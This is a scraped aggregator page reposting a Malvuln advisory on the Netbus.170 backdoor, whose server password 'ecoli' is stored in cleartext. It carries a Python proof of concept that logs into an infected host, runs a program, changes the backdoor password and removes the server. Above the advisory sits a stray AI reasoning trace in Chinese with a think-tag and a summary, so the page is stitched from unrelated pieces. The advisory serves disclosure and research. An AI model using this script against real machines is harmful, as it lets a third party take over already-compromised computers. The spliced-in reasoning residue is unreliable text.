Backdoor.Win32.Netbus.170 / Insecure Credential Storage
嗯,用户让我帮忙总结一篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”之类的开头。我得先仔细看看这篇文章讲的是什么。 文章标题是Backdoor.Win32.Netbus.170 / Insecure Credential Storage,看起来是关于一个恶意软件的漏洞。作者是Malvuln的John Page,发布时间是2025年。描述部分提到这个恶意软件监听TCP端口12632和12631,后门服务器密码“ecoli”以明文形式存储在INI文件里。攻击者知道密码后可以登录并执行各种命令,比如运行程序、更改密码甚至删除恶意软件。 还有PoC代码,展示了如何连接到恶意软件并发送命令。免责声明部分提醒用户不要滥用信息,并且不负责任何误用造成的损害。 用户的需求很明确:总结内容,简短有力。我需要抓住关键点:恶意软件名称、漏洞类型、密码存储方式、攻击者的能力以及PoC的存在。 可能的总结应该是:Netbus后门存在明文存储密码漏洞,攻击者可利用默认密码控制服务器执行命令,包括更改密码和删除自身。研究人员提供了PoC代码以示证明。 这样控制在100字以内,并且直接描述了文章内容。 </think> Netbus后门存在明文存储密码漏洞,攻击者可利用默认密码"ecoli"登录控制服务器并执行命令,包括程序运行、更改密码及删除自身。研究人员提供PoC代码以示证明。 2025-12-24 21:34:26 Author: cxsecurity.com(查看原文) 阅读量:3 收藏

Backdoor.Win32.Netbus.170 / Insecure Credential Storage

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2025 Original source: https://malvuln.com/advisory/086f0693f81f6d40460c215717349a1f.txt Malvuln Intelligence Feed: https://intel.malvuln.com/ Contact: [email protected] Media: x.com/malvuln Threat: Backdoor.Win32.Netbus.170 Vulnerability: Insecure Credential Storage Family: Netbus Type: PE32 Attack-pattern TTP: Unsecured Credentials (T1552) MD5: 086f0693f81f6d40460c215717349a1f SHA256: bba330e82434d3bcf41e18d7d15df8117883e761aa50858028833a7da84b271c Vuln ID: MVID-2025-0703 Dropped files: C:\Windows\KeyHook.dll Disclosure: 12/23/2025 Description: The malware listens on TCP ports 12632 and 12631. The backdoor server password "ecoli" is stored in cleartext in an .INI textfile, stored under "C:\Windows" having the same name as the malware. Third party attackers who have knowledge of the password can login and issue various commands separated by semicolon. Commands include program execution, change the backdoor password and malware removal using command "RemoveServer;1". [Settings] Port1=12631 ServerPwd=ecoli LogTraffic=0 MailTo= MailFrom= MailHost= Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=12631 def main(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) PAYLOAD="Password;0;ecoli\r\n" s.send(PAYLOAD.encode()) #Run a program or app: s.send("StartApp;calc\r\n".encode()) #Change backdoor password s.send("ServerPwd;malvuln;\r\n".encode()) print(chk_res(s)) #Remove backdoor use command ; 1 s.send("RemoveServer;1\r\n".encode()) s.close() if __name__ == "__main__": main() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2025120025
如有侵权请联系:admin#unsafe.sh